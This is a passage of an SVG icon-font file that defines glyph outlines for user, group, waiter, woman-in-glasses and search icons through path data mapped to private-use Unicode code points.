<glyph glyph-name="user-alt-4" horiz-adv-x="1000" unicode="&#xecfe;" d="M838 142c-42 28-89 44-134 65l-25 11c-42 19-57 58-39 101 12 27 22 55 27 84 1 6 2 11 10 10 15-1 24 9 28 22 8 24 16 48 23 72 2 10 3 19 1 29-2 9-7 18-17 19-12 0-13 5-13 15 2 16 2 32 5 48 15 111-61 213-172 229-3 1-6 2-9 3h-43c-6-5-14-3-21-5-108-25-173-121-159-232 2-16 5-31 4-47 0-6-1-10-9-11-16-2-20-13-21-27-1-20 8-37 13-56 2-10 6-19 9-29 5-18 12-31 33-30 6 1 7-3 8-8 5-31 15-61 28-90 11-23 6-47-5-70-6-14-19-19-31-25-43-20-87-36-129-58-14-7-27-15-39-24-20-14-35-32-42-56-14-47-19-95-10-143 7-32 26-53 58-63 32-10 64-14 97-17 44-4 88-6 133-7 4 0 9-1 14-2h177c37 2 75 4 112 6 42 2 84 7 126 17 44 10 65 35 69 81 3 43-2 86-13 129-7 26-22 44-44 59z" />
<glyph glyph-name="user-alt-5" horiz-adv-x="1000" unicode="&#xecff;" d="M939 15c-42 115-114 203-220 263-5 3-9 3-14-1-57-48-123-74-197-76-80-1-151 24-212 75-6 5-10 5-16 2-42-24-81-54-114-90-70-75-112-164-128-266-2-14-3-27-5-41v-31c308 0 615 0 923 0 8 0 11 2 11 11-2 53-10 104-28 154z m-439 270c156 1 282 127 282 284 0 155-127 281-282 281-157 0-282-127-282-284 1-155 128-281 282-281z m174 175c-47-51-99-90-169-92-73-3-125 39-172 92h341z" />
<glyph glyph-name="user-alt-6" horiz-adv-x="1000" unicode="&#xed00;" d="M361 397c-156 117-128 294-43 378 100 101 260 100 357-2 87-90 104-260-42-374 74-30 133-78 179-141 85-116 115-247 105-390-1-20-13-18-26-18-152 0-305 0-457 0-109 0-219 1-328 0-16 0-23 3-24 20-11 190 44 353 193 477 26 21 55 36 86 50z" />
<glyph glyph-name="user-alt-7" horiz-adv-x="1000" unicode="&#xed01;" d="M969 31c-44 122-121 217-234 281-6 3-10 4-16-1-61-51-131-79-211-81-85-2-161 25-226 80-7 5-11 5-17 2-46-26-87-58-122-96-75-81-121-176-137-285-2-15-4-29-6-44v-33c329 0 659 0 988 0 9 0 12 2 12 11-2 57-11 112-31 166z m-474 260c159-1 284 123 283 280-2 158-130 276-278 275-156 0-278-124-277-281 1-148 121-272 272-274z" />
<glyph glyph-name="user-female" horiz-adv-x="1000" unicode="&#xed02;" d="M913 208l-214 102-91 43c0 1 2 2 6 2l2 3h118c23 0 34 11 34 32v88h-2c-4 125-40 224-110 297-37 41-79 65-125 72h-11l-3 3h-32l-5-3h-11c-46-7-87-30-123-70-71-74-108-174-112-299v-88c0-21 11-32 32-32h121l5-5c2-2 3-3 5-3l-88-40-222-102c-21-8-32-27-32-56v-243c0-16 5-30 15-41 10-12 22-18 36-18h788c14 0 26 6 36 18 10 11 15 25 15 41v243c0 29-11 48-32 56z" />
<glyph glyph-name="user-male" horiz-adv-x="1000" unicode="&#xed03;" d="M500-149h-357c-16 0-31 1-45 9-24 13-38 33-38 61 0 39 1 79 0 119-1 41 16 74 47 101 31 26 66 43 103 57 55 21 108 47 161 72 8 4 11 9 12 17 2 19 4 38 6 57 0 5-1 9-5 12-31 32-52 69-63 112-2 6-5 8-12 9-12 1-20 9-23 21-4 22-6 44-10 65-3 14 2 24 14 29 6 3 7 5 6 12-7 36-4 71 5 106 17 64 73 114 133 117 16 0 30 3 44 11 25 14 52 16 79 7 73-25 123-73 144-148 8-30 4-61 0-91 0-7-2-11 7-13 13-4 19-14 16-28-3-22-7-44-11-67-2-13-11-21-24-21-6-1-10-3-11-9-7-42-30-76-59-105-8-8-10-15-8-25 2-15 4-31 5-46 0-12 5-18 16-23 58-28 117-55 177-79 30-13 59-28 85-50 29-26 46-58 46-97 0-41 0-82-1-122 0-36-25-64-61-68-39-5-79-2-119-2-86-1-173 0-259 0z" />
<glyph glyph-name="user-suited" horiz-adv-x="1000" unicode="&#xed04;" d="M500 372c-129 1-231 104-231 235 0 123 107 229 231 228 128-1 231-105 231-233 0-125-104-230-231-230z m-266-506c-71 0-141 0-211-1-17 0-24 4-23 23 5 145 54 273 150 381 30 35 67 63 106 88 21 14 27-2 33-17 25-62 50-125 75-188 34-84 68-168 102-252 12-31 10-34-25-34-69 0-138 0-207 0v0z m528 0c-70 0-140 0-210 0-27 0-30 4-20 28 60 150 120 299 180 448 10 25 15 26 39 11 139-92 213-225 242-387 4-26 4-52 7-79 2-18-6-21-22-21-72 0-144 0-216 0z m-262 60c-22 55-42 103-61 151-20 48-38 96-58 144-7 16-8 25 8 36 33 22 64 46 95 70 11 9 19 10 31 1 32-25 65-49 99-73 8-7 14-12 9-25-41-99-80-198-123-304z" />
<glyph glyph-name="user" horiz-adv-x="1000" unicode="&#xed05;" d="M670 390c-5 2-10 3-15 4-45-28-98-44-155-44-57 0-111 16-156 45-118-26-208-135-211-252-1-62-3-124-3-186 0-58-4-60 26-67 0 0 379-89 689-1 16 6 26 15 25 35-1 71 2 143-1 214-5 119-83 220-199 252z m-168 27c118 2 214 98 214 217 0 120-94 215-213 216-121 1-219-96-220-215-1-119 101-220 219-218z" />
<glyph glyph-name="users-alt-1" horiz-adv-x="1000" unicode="&#xed06;" d="M416 0c0 37 0 74 1 111 0 4-2 7-5 9-31 20-61 41-92 61-3 2-4 4-4 7-9 73-18 146-28 219-1 13-3 26-5 39 0 3 1 4 4 5 33 8 66 15 100 20 40 7 80 12 121 12 29 1 58-1 87-5 50-6 101-15 151-27 3-1 4-2 3-5-5-41-10-83-15-124-6-44-11-88-17-132 0-5-2-8-6-11-30-20-60-40-90-60-3-2-4-4-4-7 0-75 0-149 0-223 0-5-2-7-5-9-24-13-48-24-75-28-23-4-46-1-68 6-17 6-33 13-49 23-3 1-4 4-4 7 1 37 0 75 0 112z m-66 45v-91c0-2 0-4-2-5-20-14-41-25-65-31-19-4-37 0-54 7-15 5-29 13-42 22-3 2-4 4-4 8 0 63 0 127 0 190 0 4-1 6-4 9-20 20-40 40-60 60-2 2-3 4-3 7-6 40-12 81-18 121-4 34-9 68-14 102-1 5 0 7 5 8 42 12 84 22 128 28 10 1 19 2 29 3 3 0 4-1 5-4 3-30 6-61 10-91l11-100c3-34 7-67 11-100 0-3 1-5 4-7 19-13 38-26 58-38 4-3 5-5 5-10 0-30 0-59 0-88z m0 638c0 93 74 167 167 167 92 0 166-75 166-167 0-92-75-166-167-166-92 0-166 74-166 166z m300-650c0 27 0 53 0 79 0 4 1 6 4 7 30 21 61 41 92 62 3 2 4 4 4 7 6 52 12 104 18 155 4 44 9 88 14 132 0 4 1 4 5 4 43-7 84-18 125-32 4-1 5-3 4-7-4-33-7-65-11-98-5-42-9-83-14-125 0-5-2-9-6-12-22-17-43-35-65-52-2-2-3-4-3-8 0-63 0-127 0-190 0-4-1-6-4-8-15-10-30-18-46-24-24-9-48-8-71 1-15 7-29 14-43 23-2 2-3 4-3 7v79z m-364 751c15-1 32-4 48-10 3-2 3-3 2-6-34-78-24-150 31-216 2-3 2-4-1-6-77-61-189-22-212 72-17 67 19 133 84 157 14 6 30 9 48 9z m597-137c0-67-53-124-123-130-35-2-66 8-93 29-3 2-3 3-1 6 38 44 55 95 49 152-2 23-8 44-18 64-1 3-1 4 2 6 78 32 168-18 182-101 2-7 2-15 2-26z" />
<glyph glyph-name="users-alt-2" horiz-adv-x="1000" unicode="&#xed07;" d="M523-96c-88-1-160 17-226 55-78 44-104 99-88 194 18 103 70 185 154 247 13 10 20 8 30-3 30-33 62-65 92-98 10-11 16-13 26 0 26 34 54 65 81 98 8 11 15 14 28 6 102-65 159-157 178-276 19-120-57-165-142-198-46-18-95-26-133-25z m-27 505c-87-1-161 74-161 163 0 86 73 159 160 160 88 2 164-72 164-159 1-91-72-164-163-164z m202 89c19-20 38-39 55-58 8-9 13-9 20 0 21 26 42 50 63 75 7 10 13 13 24 5 92-60 138-145 140-254 1-34-18-59-44-79-28-22-60-36-94-45-12-4-16 0-18 11-20 115-78 206-172 275-5 4-11 8-4 16 12 16 20 35 30 54z m-404 6c10-21 18-41 31-57 8-10-2-13-7-17-73-59-123-132-148-223-5-17-9-35-11-53-1-9-3-14-14-11-45 15-87 34-119 70-32 36-28 78-20 119 14 76 53 138 115 185 12 9 20 9 30-3 22-25 47-49 69-74 9-10 14-9 21 1 16 21 34 40 53 63z m471 292c52-1 92-25 114-74 22-49 14-95-21-135-35-39-79-52-130-38-13 4-19 8-19 23 1 53-18 99-52 138-8 9-8 15-2 24 25 40 61 61 110 62z m-660-125c0 55 37 104 90 120 53 16 110-5 141-50 8-13 11-21-1-35-34-38-50-83-50-134 0-13-4-18-16-22-81-26-165 36-164 121z" />
<glyph glyph-name="users-alt-3" horiz-adv-x="1000" unicode="&#xed08;" d="M499 47c-100 0-199 1-299 0-11 0-12 4-13 13-4 63 33 97 82 124 32 17 67 27 100 41 13 6 26 11 37 20 14 11 17 25 8 40-7 12-16 23-24 35-41 61-56 128-39 200 18 72 79 121 154 118 62-1 109-32 133-90 34-78 19-153-25-224-7-11-16-22-24-33-14-21-11-37 11-50 25-16 53-25 80-35 39-14 75-31 104-61 26-26 31-58 28-92 0-8-5-5-9-5-36-1-71-1-107-1-66 0-131 0-197 0v0z m421 88c-23 0-45 0-68 0-4 0-8 0-10 5-29 52-76 80-129 101-23 9-47 18-70 27-9 3-12 6-5 15 44 60 66 126 61 200-3 49-19 94-51 132-6 7-4 10 2 14 65 44 165 26 199-61 27-71 12-138-30-199-5-8-12-16-17-24-9-15-7-28 7-38 18-13 39-20 59-28 33-11 66-24 94-47 29-23 41-53 38-90-1-7-5-7-10-7-23 0-46 0-70 0z m-552 139c-17-10-36-15-53-22-26-10-52-21-76-33-34-18-60-44-79-77-3-5-6-7-11-7-47 0-94 0-141 0-7 0-7 3-7 8-5 47 18 78 55 102 22 14 46 24 70 32 20 7 41 15 59 26 21 13 24 26 10 46-14 21-30 40-39 64-22 57-27 114 2 170 37 70 128 91 192 46 6-4 8-6 3-13-45-53-58-115-51-182 5-58 26-110 63-155 1-2 2-3 3-5z" />
<glyph glyph-name="users-alt-4" horiz-adv-x="1000" unicode="&#xed09;" d="M556 231c-45 18-88 38-132 59-8 3-11 8-12 17 0 11-1 23-3 34-1 7 0 13 6 18 22 22 39 47 44 79 1 4 3 6 8 6 10 0 16 6 18 16 3 16 5 33 8 50 2 10-2 17-12 20-7 2-6 5-5 10 3 22 6 45 0 67-16 56-53 92-107 110-20 7-40 5-59-5-10-6-21-4-33-5-45-1-85-42-98-90-7-26-9-52-4-79 1-4 0-6-4-8-9-4-13-12-11-22 3-16 5-32 8-48 2-9 8-15 17-16 5 0 7-2 9-7 8-32 24-59 47-82 2-3 4-6 3-10-2-14-3-28-4-42-1-6-3-10-9-13-40-18-79-37-119-53-28-10-54-23-77-42-23-20-36-45-35-75 1-30 0-59 0-89 0-21 10-35 28-45 11-6 22-7 34-7 88 0 176 0 264 0 65 0 129 0 193 0 30 0 59-2 88 2 27 3 45 24 46 50 0 30 0 61 0 91 0 29-12 53-34 72-19 16-41 28-63 37z m444-112c-1 22-11 38-29 49-14 8-30 13-45 17-37 9-75 18-112 29-12 4-18 12-18 24 0 4 0 8-1 12-2 7 1 8 7 9 39 2 75 12 110 29 15 7 16 7 5 20-26 31-42 65-45 106-1 23 0 47-1 71 0 21-4 41-14 60-12 25-32 39-59 41-9 0-16 0-20 10-3 7-11 11-19 13-15 5-30 4-46 2-48-4-84-26-104-72-11-24-15-51-17-77-2-24-1-49-5-72-4-25-8-50-25-70-8-10-18-17-28-25 6-5 11-8 17-11 35-18 72-25 110-26 16-1 16-1 14-16 0-2 0-5 0-8-1-9-5-15-14-17-8-3-9-5-3-12 21-23 31-49 31-80-1-26-1-51 0-77 0-23-1-46-16-67 5-1 8-1 11-1 68 0 136 0 204 0 25 0 49-1 74 1 22 1 38 18 38 40 0 33 0 65 0 98z" />
<glyph glyph-name="users-alt-5" horiz-adv-x="1000" unicode="&#xed0a;" d="M742 208c-28 19-60 31-91 45-5 2-11 4-17 7-28 13-39 40-27 69 8 19 15 38 19 58 0 4 1 7 7 6 10 0 16 6 19 15 5 16 10 33 15 49 2 7 2 13 1 20-1 6-5 12-12 13-7 0-9 4-8 10 1 11 1 22 3 33 10 76-42 145-117 156-2 0-4 1-7 2h-29c-4-4-9-2-14-3-73-17-118-83-108-159 1-10 3-21 2-32 0-4-1-6-5-7-11-1-15-9-15-19-1-13 5-25 9-37 1-7 4-14 6-21 3-11 8-20 22-20 4 0 5-2 6-5 4-21 10-42 19-61 7-17 4-33-3-48-4-10-13-14-22-17-29-14-59-25-88-40-9-5-18-10-26-16-14-10-24-22-29-39-9-32-13-64-6-97 4-22 17-36 39-43s44-9 66-11c30-3 60-4 91-5 3 0 6-1 9-2h121c26 2 51 3 76 5 29 1 58 4 86 11 31 7 45 24 47 55 2 30-1 59-9 88-4 18-15 30-30 40z m-457 28c17 9 33 17 50 24 3 2 7 2 10 6-13 6-25 10-36 16-22 10-30 29-22 51 6 16 12 32 15 48 1 4 2 6 6 6 9 0 13 5 15 12 4 13 8 26 12 39 2 5 2 10 0 15-1 7-7 12-13 10-12-5-11 2-10 9 2 14 4 28 4 43 0 63-58 111-120 100-49-9-85-52-84-102 0-14 1-29 3-43 1-4 3-10-5-9-15 2-20-2-18-17 2-17 8-33 14-49 2-5 6-8 11-8 5 0 8-2 9-7 3-16 8-31 14-46 9-23 0-42-22-53-23-10-45-19-67-30-30-13-46-36-49-68 0-3 0-7-2-10v-33c2-1 2-3 2-5 3-18 13-31 31-36 10-4 21-6 32-7 49-7 98-6 148-8 6 0 8 2 8 9-2 15 0 30 1 45 6 43 23 78 63 98z m707-38c-3 14-12 24-24 32-22 13-46 21-68 32-20 9-27 27-19 48 3 5 5 8 11 9 18 3 36 7 53 14 13 6 26 13 35 26 3 5 4 9-4 12-10 4-18 10-24 19-14 18-18 40-20 61-3 22-4 43-11 64-21 59-93 89-149 61-40-20-58-56-67-98-5-26-6-53-17-78-6-15-16-26-33-28-8-2-7-5-4-10 5-10 13-17 22-22 21-12 45-17 69-21 3-1 7-1 9-4 9-17 9-44-14-52-8-3-16-7-24-11 2-2 2-2 3-3 5-2 10-5 15-7 29-15 55-34 64-69 6-23 9-46 9-70 0-10 3-12 13-11 17 1 35 0 53 1 31 1 63 2 93 8 19 4 32 13 35 33 0 1 1 2 2 2v28c-3 11-5 22-8 34z" />
<glyph glyph-name="users-alt-6" horiz-adv-x="1000" unicode="&#xed0b;" d="M384 297c-99 74-81 185-27 239 63 63 164 63 226-2 54-57 65-164-27-236 47-19 84-50 113-89 54-74 72-157 67-247-1-12-9-11-17-11-96 0-193 0-289 0-69 0-138 0-207 0-10 0-15 2-16 12-7 120 28 224 123 302 16 13 34 23 54 32z m287 185c-37 28-61 62-66 108-6 71 38 135 107 154 68 19 141-15 170-80 27-61 12-127-39-170-3-3-19-7-3-15 90-44 135-121 154-216 6-30 8-60 5-90-1-10-4-14-15-14-84 1-167 1-251 0-10 0-14 4-18 12-26 52-62 95-112 125-10 6-10 9-2 17 33 38 48 82 42 132-2 18 2 27 18 33 3 1 5 2 10 4z m-494-121c-58 46-84 103-64 174 18 61 62 99 125 109 61 9 111-11 149-60-119-69-117-210-40-283-24-15-47-32-66-54-56-61-87-133-92-216-1-12-4-17-17-17-51 1-102 1-153 0-14 0-17 6-18 17-9 123 45 268 172 327 1 1 2 2 4 3z" />
<glyph glyph-name="users-social" horiz-adv-x="1000" unicode="&#xed0c;" d="M609 55c-3 64-45 119-108 136-3 1-5 2-8 2-25-15-53-24-84-24-31 0-60 9-85 25-64-14-113-73-114-137-1-34-2-67-2-101 0-31-2-32 14-36 0 0 206-48 374-1 9 4 14 9 14 19-1 39 0 78-1 117z m-353 137c13 10 27 16 42 23-27 27-45 64-47 105-1 0-2 0-3 0-30 0-61 1-92 0-36-1-67-11-93-30-12-10-61-57-63-182v-62c51-16 104-27 158-34 17-2 24 1 23 21-2 65 21 119 75 159z m474 106c-51 31-108 21-163 22-2-41-20-78-47-105 25-11 48-24 66-44 38-40 54-88 50-142-1-13 3-19 18-18 46 3 91 12 134 29 11 4 16 10 16 22-1 39 0 79-2 118-2 52-28 91-72 118z m-320-92c64 1 116 53 116 117 0 65-51 117-116 118-65 0-119-52-119-117 0-64 55-119 119-118z m-204 121c3 0 9 0 15 1 11 3 22 5 30 10 4 50 30 93 69 120 0 3-1 6-1 9-12 59-69 102-126 95-64-8-111-60-108-120 4-65 54-114 121-115z m731 81c-26 19-57 29-93 30-31 1-62 0-92 0-1 0-2 0-3 0-2-41-20-78-47-105 15-7 30-13 42-23 54-39 77-94 75-159-1-20 6-23 24-21 53 7 106 18 157 34v62c-2 125-51 172-63 182z m-188 48c9-5 19-7 31-9 5-2 11-2 14-2 67 1 117 50 121 115 3 60-44 113-108 120-57 7-114-36-126-95 0-3-1-6-1-9 39-27 65-70 69-120z m-261 14c0-2-1-4-1-6 46-26 78-74 80-131 1 0 3-1 5-1 75-21 149 36 149 114-1 61-46 110-109 116-55 6-111-35-124-92z m-21 4c3 21 12 39 23 60-59 5-115 4-176 0 16-22 23-43 26-64 21 10 44 15 69 15 20 0 40-4 58-11z m-65 71l1 0c41 0 82 21 106 57 10 15 17 31 20 48 1 8 2 16 2 24 0 62-45 114-104 126l-2 0h-1c-7 1-15 2-22 2-71 0-128-57-128-128s57-129 128-129z" />
<glyph glyph-name="users" horiz-adv-x="1000" unicode="&#xed0d;" d="M624 301c-4 1-7 2-11 3-30-19-66-30-104-30-39 0-75 11-106 31-79-18-140-92-142-171-1-42-2-83-2-125 0-39-3-40 17-46 0 0 256-59 465 0 12 4 18 10 18 24-1 48 0 96-1 144-4 81-57 148-134 170z m-306 1c16 12 34 20 53 29-34 33-56 79-58 130-2 0-3 0-4 0-38 0-76 1-114 0-46-1-85-14-116-38-15-11-77-70-79-226v-77c64-20 129-34 196-42 22-3 30 1 30 26-3 81 26 149 92 198z m680-15c-3 65-35 114-90 147-63 39-134 26-203 27-2-51-24-97-58-131 32-13 59-30 83-54 47-49 66-109 62-176-1-17 3-25 22-23 57 4 113 15 166 36 14 5 20 12 20 27-1 49 0 99-2 147z m-488 32c80 1 145 67 145 147 0 80-64 145-144 146-82 0-148-65-149-146 0-80 68-148 148-147z m-253 151c3 0 10 0 17 2 14 3 28 6 39 12 4 62 37 116 85 149 0 3-1 7-1 11-15 73-86 127-157 119-79-10-138-76-134-150 4-81 67-142 151-143z m448 8c2-1 5-2 7-2 93-26 185 45 184 142 0 76-56 136-134 145-69 7-139-45-155-115 0-3-1-5-1-7 57-33 96-93 99-163z" />
<glyph glyph-name="waiter-alt" horiz-adv-x="1000" unicode="&#xed0e;" d="M500 654c-81 0-145-65-146-145-2-75 59-148 146-149 80 0 147 66 147 147-1 82-66 147-147 147z m17-364c-9-4-24-6-31-2-21 15-46 18-71 26-2-7-3-13-4-19-3-22 3-43 9-64 2-7 6-9 12-6 13 6 26 10 39 17 6 3 11 10 16 15 1 1 2 4 4 4 6 0 12 1 18 0 3-1 4-6 7-8 3-4 6-8 10-10 14-6 29-12 44-19 5-2 8 0 9 6 3 12 7 24 9 36 3 15 4 31-4 46-24-3-46-10-67-22z m-17 498c-242 0-437-196-437-438 0-103 35-197 94-272 35-44 79-81 128-109 10-6 20-11 30-16 56-26 119-41 185-41 67 0 130 15 186 42 10 5 20 10 30 15 49 28 92 65 127 110 59 74 94 168 94 271 1 242-195 438-437 438z m-215-796v119h30v-135c-10 5-20 10-30 16z m402-15v135h29v-119c-10-6-20-11-29-16z m155 181c-3 88-72 174-174 182-7 0-11-2-14-8-42-84-85-167-128-250-8-16-16-31-24-48-3 5-5 8-6 11-47 91-93 181-140 272-12 25-12 25-40 22l-5-1c-91-19-154-94-154-187 0-13 0-26 0-38-47 67-74 149-74 237 0 230 187 417 417 417 230 0 417-187 417-417 0-88-27-170-74-237v20c0 8 0 17-1 25z" />
<glyph glyph-name="waiter" horiz-adv-x="1000" unicode="&#xed0f;" d="M293 466c2-15 10-30 16-44 4-10 11-17 22-19 3-1 3-4 4-7 3-20 9-39 20-56 14-24 34-43 56-59 17-11 33-23 52-31 8-3 16-4 24-6h28c7 2 15 3 22 5 20 7 36 19 53 30 25 17 46 37 60 63 8 14 14 29 15 45 0 2 0 4 0 6 1 6 3 9 9 12 12 5 18 17 22 29 4 11 9 22 12 34v16c-2 5-3 11-5 16-3 8-8 16-16 20-3 2-3 4-3 7-1 15 2 29 4 44 4 40-2 79-18 116-5 9-10 18-11 29-1 3-3 4-5 4-8 1-12 5-14 12-1 2-2 4 0 6 3 3 1 4-1 4-6 2-12 2-19 1-3-1-4 0-5 4-1 5-2 11-5 16-1 3-2 4-5 3-11-2-22-2-32 2-6 3-10 8-12 14-4 11-10 19-23 20-3 0-3 2-3 5 0 6 0 13 0 20-6-3-10-7-16-9-7-2-9-1-10 7 0 9 3 17 6 25-16-2-27-10-32-25-4 9 1 15 4 23-15-5-27-14-36-25-6-7-11-15-17-22-1-2-1-4-4-4-2 1-2 3-3 5-1 2-1 4-2 7-5-2-7-6-9-10-5-8-8-16-12-24-5-10-9-11-17-4-1 0-2 1-2 1-7 7-7 7-13 0-11-13-19-27-26-42-5-8-10-16-17-22-6-5-11-11-17-17 3-2 6-1 8-1 6-1 7-3 5-9-5-11-11-21-16-31-1-2-2-4-3-6 3 0 5 2 7 2 1 0 3 1 4 0 2-2 0-3 0-5-5-14-10-28-16-42 1-1 2 0 3 0 8 3 9 3 8-5-1-24-2-47 0-70 0-2 0-3-2-5-17-14-19-33-17-53z m21 33l2 0 4-25c1-5 11-10 16-8 2 1 1 3 1 5-1 13-1 27-2 40-1 20 4 39 8 59 6 26 10 53 19 79 2 7 5 13 8 20 7 15 19 22 35 22 16 1 32-1 47-5 20-5 39-3 59 2 16 5 32 7 49 7 18 1 32-8 42-22 12-15 19-33 25-52 6-14 11-28 18-41 1-2 2-4 4-6 11-11 12-26 12-40 1-19 1-37 1-56 0-3-1-6 3-6 4 1 10-2 10 5 1 8 2 15 3 23 0 1 0 4 2 4 2 1 3-1 4-2 7-10 8-21 7-31-2-16-10-29-16-43-3-7-9-12-18-9-3 0-3-2-4-4-2-8-3-16-4-24-1-22-10-40-23-57-24-30-55-53-90-68-29-11-59-9-87 9-18 12-36 24-52 38-26 24-41 54-47 89-1 3-1 5-2 8-1 5-2 10-10 8-4-1-9 2-11 7-9 17-19 34-19 54 1 7 2 14 6 20z m165-368c1-1 2-2 2 1 0 6 0 12-6 16-16 12-31 25-48 36-8 6-14 4-20-4-2-3-4-7-5-11-8-25-12-51-6-77 2-11 5-21 11-31 5-9 11-10 20-5 14 9 27 19 41 28 6 4 9 9 10 16 0 0 0 0 0 0 2 7 2 7-6 6-6-1-12-2-18-2 6 2 12 4 18 5 6 2 9 4 9 11 0 5 1 5-4 7-11 4-23 6-34 10 4 0 7 0 11-1 8-1 16-3 25-5z m56-27c-3 0-3-1-3-3 0-4 0-8-1-12 0-2 0-3 2-4l12-8c10-6 20-12 29-19 7-4 13-2 18 4 1 1 2 3 3 4 7 15 11 31 12 48 1 15-2 29-6 43-2 8-3 16-7 22-6 9-13 11-21 5-17-12-32-24-48-36-1-1-2-2-1-4 1-4 3-7 4-11 0-3 1-3 4-2 5 2 10 4 15 6 4 1 8 2 12 3-9-5-18-9-26-14-3-1-3-2-3-5 1-3 1-6 2-9 0-2 1-3 3-4 8-3 16-5 24-8l0-1c-8 2-16 3-24 5z m-50-14c6-2 13-3 20-2 3 0 6-1 9 0 10 1 10 1 11 11 2 14-1 27-6 41-2 4-5 6-10 6-7 1-14-2-21-2-3 1-4-2-3-6 0-1 0-2 1-3 0-13-1-26-4-38-2-4 0-5 3-7z m473-91c-18 77-27 89-92 123-2 1-4 2-6 3-37 17-75 28-114 39-30 9-60 18-90 27 0-1 0-2 0-3 0-3 0-5 1-7 2-29 3-57-8-84-30-72-75-133-139-178-4-3-7-4-10-4-3 0-6 1-10 4-64 45-108 106-139 178-11 27-10 55-7 84l0 7c0 1 0 2 0 3-30-9-60-18-90-27-38-11-77-22-113-39-3-1-5-1-7-3-65-34-74-46-91-123-11-47-9-95-8-143 0-5 2-6 6-6 3 0 6 0 8 0h902c3 0 5 0 8 0 5 0 7 1 7 6 0 48 2 96-8 143z" />
<glyph glyph-name="woman-in-glasses" horiz-adv-x="1000" unicode="&#xed10;" d="M31-62c2 16 4 33 6 49 4 26 11 50 21 73 6 15 16 27 28 36 31 24 67 39 104 51 50 16 100 30 150 46 1 0 2 0 3 0-2-17-2-33-2-50 1-15 3-30 9-44 30-72 75-133 139-179 8-6 14-6 21 0 65 46 110 107 140 179 11 27 10 56 7 84l0 7c-1 1 0 2 0 3 25-8 51-15 76-23 43-12 87-24 128-43l7-3c57-22 83-67 93-125 6-43 8-86 7-129 0-7 0-13 0-20-309 0-619 0-928 0-8 0-9 2-9 9 1 26 0 53 0 79z m494 912c15-3 29-5 43-8 31-7 60-20 85-39 49-36 70-86 73-145 2-34-1-67-6-101-1-5-1-8 6-8 10-1 16-9 20-18 5-15 5-29 2-44-4-24-13-45-30-63-2-2-4-5-4-8 1-35 6-70 21-102 15-28 37-49 66-62 3-1 5-2 7-3 1-1 1-1 3-2-56-20-112-33-170-8-13 6-25 14-36 24-5 6-9 6-15 1-17-13-36-23-56-31-24-10-48-9-72 1-19 8-37 18-53 31-5 3-8 5-13 0-33-33-75-43-121-39-29 2-57 10-85 21 1 1 1 2 2 2 50 20 76 58 87 109 4 18 5 36 6 53 1 6-2 10-5 15-24 28-34 61-28 97 2 14 9 25 25 26 6 0 3 4 3 7-4 30-7 60-7 90 1 107 62 168 151 194 17 5 34 6 51 10h50z m-122-406c-24 0-43 4-59 14-21 13-35 31-30 59 1 8-5 13-12 16-5 4-10 0-14-4-4-4-6-9-7-14-1-27 6-51 24-70 6-7 11-13 14-21 30-64 74-115 135-152 31-19 60-19 92 0 60 37 104 88 134 151 3 6 5 13 10 17 18 15 25 36 28 58 2 11 2 22-6 31-4 4-9 8-15 4-6-4-12-8-11-16 5-28-9-47-32-60-28-16-58-17-88-7-23 8-41 21-48 46-1 5 2 12-4 15-5 2-11 1-16 1-3 0-6 0-8 0-5 0-7-2-8-8 0-19-11-32-26-43-17-12-37-17-53-17z m97 279c-7-9-14-19-21-27-44-48-97-81-160-95-5-1-7-2-7-7 2-20 4-39 8-59 2 1 2 1 3 1 30 40 105 44 142 8 4-3 7-3 12-2 15 3 31 3 46 0 5-1 9 0 13 4 7 7 16 12 26 15 44 15 83 9 117-26 4 20 7 39 8 58 1 6-2 6-6 7-68 16-124 51-168 104-5 6-9 13-13 19z m101-257c20 0 38 5 50 15 19 15 19 35 0 51-25 20-73 20-98 0-19-16-19-36 0-51 15-12 32-15 48-15z m-202 0c14 0 30 3 44 12 24 17 24 40 0 56-25 18-68 17-92 0-22-16-22-39 0-55 14-10 30-13 48-13z" />
<glyph glyph-name="search-1" horiz-adv-x="1000" unicode="&#xed11;" d="M800 146c-7 8-8 20-2 29 44 68 69 148 69 235 0 239-194 434-433 434-239 0-434-195-434-434 0-239 195-434 434-434 93 0 179 30 250 80 8 6 21 6 28-2l155-155c1-1 2-2 3-3 2-1 9-8 17-15l18-19c7-7 19-7 26 0l64 64c7 7 7 19 0 26l-195 194z m-104 62c-14-19-30-36-48-51-58-49-133-79-214-79-183 0-332 149-332 332s149 332 332 332c183 0 331-149 331-332 0-76-26-146-69-202z" />
<glyph glyph-name="search-2" horiz-adv-x="1000" unicode="&#xed12;" d="M973 10l-230 230c-34-54-79-99-132-133l229-230c37-36 96-36 133 0 36 37 36 96 0 133z m-223 465c0 207-168 375-375 375-207 0-375-168-375-375 0-207 168-375 375-375 207 0 375 168 375 375z m-375-281c-155 0-281 126-281 281 0 155 126 281 281 281 155 0 281-126 281-281 0-155-126-281-281-281z m-219 281h63c0 86 70 156 156 156v63c-121 0-219-98-219-219z" />
<glyph glyph-name="search-document" horiz-adv-x="1000" unicode="&#xed13;" d="M868 34c-7 7-8 20-3 29 27 43 43 95 43 149 0 158-129 287-286 287-158 0-287-129-287-287s129-286 287-286c59 0 114 18 159 49 9 6 22 5 29-2l98-98c0-1 1-1 2-2 1-1 8-7 15-15l3-3c7-7 19-7 27 0l32 33c8 7 8 19 0 27l-119 119z m-73 45c-10-12-20-24-32-33-38-33-87-53-141-53-121 0-219 99-219 219 0 121 98 219 219 219 120 0 219-98 219-219 0-50-18-96-46-133z m-282 494v48c0 5-4 9-9 9h-332c-5 0-10-4-10-9v-48c0-5 5-10 10-10h332c5 0 9 5 9 10z m-139-74h-202c-6 0-10-5-10-10v-47c0-5 5-10 10-10h134c19 26 42 48 68 67z m-110-137h-92c-5 0-10-4-10-9v-46c0-5 5-10 10-10h72c4 23 11 44 20 65z m-102-140v-47c0-5 4-9 10-9h72c-5 21-7 43-7 66h-65c-6 0-10-4-10-10z m-107-235c-5 0-9 4-9 9v806c0 5 4 10 9 10h438c5 0 12-4 15-8 18-20 35-40 53-60 21-24 42-48 62-73 4-3 6-11 6-16v-101c13-2 26-6 39-10v296c0 6-4 10-10 10h-641c-5 0-9-4-9-10v-885c0-5 4-9 9-9h388c-21 11-40 25-57 41h-293z" />
